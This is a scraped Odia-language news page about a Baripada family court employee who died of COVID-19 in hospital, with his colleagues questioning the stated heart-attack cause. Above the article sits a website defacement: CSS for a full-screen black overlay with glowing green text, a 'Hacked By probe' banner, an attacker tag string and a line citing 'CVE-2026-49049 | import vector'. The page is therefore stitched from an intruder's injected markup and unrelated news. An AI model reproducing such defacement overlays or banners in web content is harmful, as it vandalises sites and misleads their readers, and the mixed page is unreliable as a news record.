html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

ଚିକିତ୍ସାଧୀନ ଅବସ୍ଥାରେ ଫେମିଲି କୋର୍ଟ କର୍ମଚାରୀ ମୃତ

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

ବାରିପଦା(ଦିଲ୍ଲୀପ ମହାନ୍ତି )- କୋଭିଡ଼-୧୯ ଭୁତାଣୁରେ ଆକ୍ରାନ୍ତ ଥାଇ ଚିକିତ୍ସାଧୀନ ଅବସ୍ଥାରେ ବାରିପଦା ଫେମିଲି କୋର୍ଟ କର୍ମଚାରୀ ମୃତ ପ୍ରଭାତ ବେହେରାଙ୍କର ଗତ କାଲି ବିଳମ୍ବିତ ରାତିରେ ବାଙ୍କିଶୋଳସ୍ଥିତ କୋଭିଡ଼ ହସପିଟାଲରେ ମୃତ୍ୟୁ ହୋଇଥିବାର ଜଣାପଡ଼ିଛି । ତେବେ ଦିବଂଗର ଫେମିଲି କୋର୍ଟର କର୍ମଚାରୀ ପ୍ରଭାତ ଆସ୍ତେ ଆସ୍ତେ ସୁସ୍ଥ ହେବାରେ ଲାଗିଥିଲେ । ୨ ଦିନ ପରେ କୋଭିଡ଼ ହସପିଟାଲରୁ ଡ଼ିସଚାର୍ଯ୍ୟ ହୋଇ ଘରକୁ ଫେରିଥାନ୍ତେ । ଘରେ ସ୍ତ୍ରୀ, ପୁଅ ଓ ପରିବାରର ସଦସ୍ୟମାନେ ତାଙ୍କ ଫେରିବା ରାସ୍ତାକୁ ଅନାଇ ବସିଥିଲେ । ଏହି ସମୟରେ ଆଜି ସକାଳ ସମୟରେ ତାଙ୍କର ମୃତ୍ୟୁ  ଖବର ପ୍ରଚାରିତ ହୋଇବା ପରେ ଏକ ଶୋକାକୋଳ ପରିବେଶ ସୃଷ୍ଟି ହୋଇଥିଲା । ପ୍ରଭାତଙ୍କର ହାର୍ଟ ଚୋକ୍ ହେବାରୁ ତାଙ୍କର ମୃତ୍ୟୁ  ହୋଇଥିବାର କୁହାଯାଉଥିବା ସମୟରେ ଏହାକୁ ସାଙ୍ଗସାଥୀ ମହଲ ସହଜରେ  ଗ୍ରହଣ କରିପାରି ନାହାନ୍ତି । ଜଣେ ସୁସ୍ଥ ଅବସ୍ଥାକୁ ଫେରି ଆସିଥିବା ବ୍ୟକ୍ତିର ହାର୍ଟ ଚୋକ୍ କରିବା ଉପରେ ପ୍ରଶ୍ନ ଉଠାଇବା ସହ ମୟୂରଭଞ୍ଜ ଜିଲ୍ଲା ପ୍ରଶାସନ ପକ୍ଷରୁ କୋଭିଡ଼ ପରିଚାଳନା ଉପରକୁ ମଧ୍ୟ ଅଙ୍ଗୁଳି ଉଠାଇଛନ୍ତି ।

 

0
0
0
s2sdefault